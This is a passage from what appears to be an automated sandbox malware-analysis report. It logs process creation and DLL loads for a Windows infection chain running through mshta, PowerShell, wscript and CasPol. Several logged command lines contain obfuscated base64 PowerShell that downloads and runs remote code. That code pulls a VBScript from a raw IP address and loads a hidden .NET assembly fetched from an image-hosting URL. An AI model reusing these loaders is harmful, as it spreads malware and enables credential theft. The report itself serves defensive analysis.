AgICAgICAtbmFNZVNQQWNlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRkaU5YdHJnICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1QYXNzVGhydTsgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJERjRkpzOjpVUkxEb3dubG9hZFRvRmlsZSgwLCJodHRwOi8vMTkyLjMuMTIyLjE1OS8xMjEvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pbmdvbi50SUYiLCIkRW5WOkFQUERBVEFcL3NpbXBsZWdyZWF0ZmVhdHVyZXN3aXRobmljZXNwZWFraW5ndGhpbmdzZW50aXJlbGlmZWdvaS52YlMiLDAsMCk7U1RhUlQtU0xlZXAoMyk7SU52b2tFLWV4UFJlU1NpT24gICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIiRlTlY6QVBQREFUQVwvc2ltcGxlZ3JlYXRmZWF0dXJlc3dpdGhuaWNlc3BlYWtpbmd0aGluZ3NlbnRpcmVsaWZlZ29pLnZiUyI='+[ChAR]0X22+'))')))"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe" /noconfig /fullpaths @"C:\Users\user\AppData\Local\Temp\r1df4acf\r1df4acf.cmdline"Jump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\simplegreatfeatureswithnicespeakingthingsentirelifegoi.vbS" Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\user\AppData\Local\Temp\RES38A1.tmp" "c:\Users\user\AppData\Local\Temp\r1df4acf\CSC5F9E68122E144DC389875BBF6681BEA.TMP"Jump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" $capellmeister = 'JG5vbmV2YWx1YXRpdmUgPSAnaHR0cHM6Ly9yZXMuY2xvdWRpbmFyeS5jb20vZHp2YWk4NnVoL2ltYWdlL3VwbG9hZC92MTczNDA1MDk5MS91bnhhb29peWt4Zm13OXBhbjR6MS5qcGcgJzskZXJ5dGhyb3N0b211bSA9IE5ldy1PYmplY3QgU3lzdGVtLk5ldC5XZWJDbGllbnQ7JHBpZWhvbGVzID0gJGVyeXRocm9zdG9tdW0uRG93bmxvYWREYXRhKCRub25ldmFsdWF0aXZlKTskcGxhY29kZXJtYXRvdXMgPSBbU3lzdGVtLlRleHQuRW5jb2RpbmddOjpVVEY4LkdldFN0cmluZygkcGllaG9sZXMpOyRiYW5kYm94ID0gJzw8QkFTRTY0X1NUQVJUPj4nOyR5ZW1hbiA9ICc8PEJBU0U2NF9FTkQ+Pic7JHByZWxhY3kgPSAkcGxhY29kZXJtYXRvdXMuSW5kZXhPZigkYmFuZGJveCk7JGZhbWVkID0gJHBsYWNvZGVybWF0b3VzLkluZGV4T2YoJHllbWFuKTskcHJlbGFjeSAtZ2UgMCAtYW5kICRmYW1lZCAtZ3QgJHByZWxhY3k7JHByZWxhY3kgKz0gJGJhbmRib3guTGVuZ3RoOyR3aXRlbmFnZW1vdCA9ICRmYW1lZCAtICRwcmVsYWN5OyRzb3Bob21hbmlhYyA9ICRwbGFjb2Rlcm1hdG91cy5TdWJzdHJpbmcoJHByZWxhY3ksICR3aXRlbmFnZW1vdCk7JGdyaWZmaW4gPSAtam9pbiAoJHNvcGhvbWFuaWFjLlRvQ2hhckFycmF5KCkgfCBGb3JFYWNoLU9iamVjdCB7ICRfIH0pWy0xLi4tKCRzb3Bob21hbmlhYy5MZW5ndGgpXTskYXV0b3Bsb2lkeSA9IFtTeXN0ZW0uQ29udmVydF06OkZyb21CYXNlNjRTdHJpbmcoJGdyaWZmaW4pOyRsZWRlcml0ZSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV06OkxvYWQoJGF1dG9wbG9pZHkpOyR1bmJpb3R1cmJhdGVkID0gW2RubGliLklPLkhvbWVdLkdldE1ldGhvZCgnVkFJJyk7JHVuYmlvdHVyYmF0ZWQuSW52b2tlKCRudWxsLCBAKCcwLzFEYkJwL3IvZWUuZXRzYXAvLzpzcHR0aCcsICckYmFja3NjYXR0ZXJpbmdzJywgJyRiYWNrc2NhdHRlcmluZ3MnLCAnJGJhY2tzY2F0dGVyaW5ncycsICdDYXNQb2wnLCAnJGJhY2tzY2F0dGVyaW5ncycsICckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCckYmFja3NjYXR0ZXJpbmdzJywnJGJhY2tzY2F0dGVyaW5ncycsJyRiYWNrc2NhdHRlcmluZ3MnLCcxJywnJGJhY2tzY2F0dGVyaW5ncycsJycpKTs=';$hypoxanthine = [System.Text.Encoding]::UTF8.GetString([System.Convert]::FromBase64String($capellmeister));Invoke-Expression $hypoxanthineJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\foowuyqkwn"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\qiupnqamsvkxb"Jump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\user\AppData\Local\Temp\skzzoilfgdcclexm"Jump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mshtml.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: powrprof.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wkscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: umpdc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msiso.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: srpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msimtf.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxgi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: textinputframework.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coreuicomponents.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: coremessaging.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: resourcepolicyclient.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: jscript9.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: msls31.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d2d1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dwrite.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d11.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: d3d10warp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dxcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dataexchange.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: dcomp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\mshta.exeSection loaded: twinapi.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kdscli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntmarta.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sxs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: vbscript.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrobj.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mlang.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: scrrun.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: edputil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: wintypes.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: appresolver.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: bcp47langs.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: slc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: sppc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\wscript.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: userenv.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: schannel.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mskeyprotect.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ntasn1.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncrypt.dllJump to behavior
                    Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ncryptsslp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winmm.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: urlmon.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iertutil.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: srvcli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: netutils.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: iphlpapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: sspicli.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: mswsock.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: dnsapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rasadhlp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: fwpuclnt.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptsp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: rsaenh.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: cryptbase.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: windows.storage.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wldp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: profapi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: kernel.appcore.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: ondemandconnroutehelper.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winhttp.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: winnsi.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: version.dllJump to behavior
                    Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeSection loaded: wininet.dllJump to behavior
